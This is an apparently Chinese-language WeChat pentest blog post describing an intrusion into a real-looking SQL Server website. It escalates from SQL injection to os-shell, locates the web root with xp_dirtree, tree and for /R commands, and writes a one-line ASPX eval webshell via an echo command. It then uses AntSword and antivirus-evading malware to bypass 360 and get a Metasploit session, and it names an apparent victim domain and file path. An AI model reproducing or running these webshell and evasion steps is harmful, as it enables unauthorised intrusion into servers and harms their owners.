声明：该公众号大部分文章来自作者日常学习笔记，也有部分文章是经过作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

0X01.前言

1.在一次打点的时候,找到一个存在sql注入(联合注入无网站报错回显)的网站,是一个sqlserver可以拿os-shell的场景,一般遇到这种情况,可以选择powershell直接上线CS,或者远程下载木马文件然后执行上线,但是通过对tasklisk的探测:https://www.ddosi.org/av/1.php发现机器存在360杀毒,对一些powsershell命令都会进行拦截,这种情况我们可以通过写入shell文件到网站路径下,然后获取webshell上传免杀马上线。

0X02.方法介绍

方法一(通过sql语句)：

1.用sql-shell执行下列语句可以查询目标机器的目录,文件,但实际测试发现只返回NULL,这个方法没成功。

exec xp_dirtree 'c:'        # 列出所有c:文件、目录、子目录exec xp_dirtree 'c:',1      # 只列c:目录exec xp_dirtree 'c:',1,1    # 列c:目录、文件exec xp_subdirs 'C:';       # 只列c:目录

方法二(通过tree命令导出网站所有文件目录结构):

1.第二个方法,使用windows自带的命令tree,语法如下:

TREE [drive:][path] [/F] [/A] # -f 生产目录和文件,如果不跟的话就只返回当前路径的目录结构

2.利用xshell的日志功能导出日志(记得先开启日志记录再跑命令)因为首先探测了下,web目录应该是放在D盘的,使用命令

tree D: /f

3.然后使用文本搜索网站文件就可以找到真实路径了。

4.点击上面的open log Folder可以知道日志记录的位置,打开就能看到了(这种方法也可以让我们有的时候xshell回显太多看不完整的时候使用)

5.都拿到整个D的文件结构了,现在只需要在web网站上随便找个静态资源的名字搜索一下就知道真实路径:D:\syswin\WX\SyswinServiceWX\1898442_syzf.syswinsoft.com.pfx了。

方法三(通过windows的文件搜索命令)

1.使用以下语法即可快速打出文件真是路径:

for /R path %i in (*file) do @echo %i # path代表路径 file代表文件名

2.在os-shell上执行

for /R D://  %i in (*.pfx) do @echo %i

0X03.上线msf

1.已经拿到路径了,这下就好办多了,网站是aspx的直接上一句话。

echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["sou"],"unsafe");%^> > D://syswin//WX//SyswinServiceWX/sou.aspx

2.蚁剑直接连接,成功拿到webshell

3.上传免杀马成功绕过360上线msf

0X04.后续

    后续就是提权和内网渗透了,大概就是那几套流程,该主题主要讲讲一些技巧的东西,提供给新手师傅学习。

原文始发于微信公众号（夜安团队SEC）：渗透技巧分享-sqlserver-os-shell(有杀软)绕过免杀上线